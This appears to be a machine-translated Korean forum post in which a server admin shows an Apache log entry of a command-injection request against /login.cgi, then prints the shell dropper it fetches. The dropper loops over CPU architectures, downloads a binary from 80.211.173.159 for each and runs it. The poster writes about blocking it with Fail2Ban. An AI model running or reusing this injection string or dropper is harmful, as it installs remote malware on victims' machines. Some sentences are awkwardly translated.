최근에 서버 아파치 로그에서 다음과 같은 이상한 줄을 발견했습니다.
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
그래서 나는 커스텀 Fail2Ban 필터를 만들고 /login.cgi URL을 요청하는 IP를 금지하기 시작했습니다.
그러나 그들이 무엇을하려고하는지 궁금해했기 때문에 그들이 실행하려고하는 스크립트를 뽑았으며 정확히 무엇을하는지 알 수없는 것 같습니다. / var 및 / tmp에서 아치 폴더를 제거하는 것에 대해 뭔가?
어쨌든, 여기 있습니다 :
#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server:$http_port/$name -O -> $u
./$u $name
done
hxxp://80.211.173.159:80/$name
경우 $name
에 CPU 아키텍처의 각이다 bin_names
. 따라서 7 개의 공격 스크립트가 다운로드되어 실행됩니다.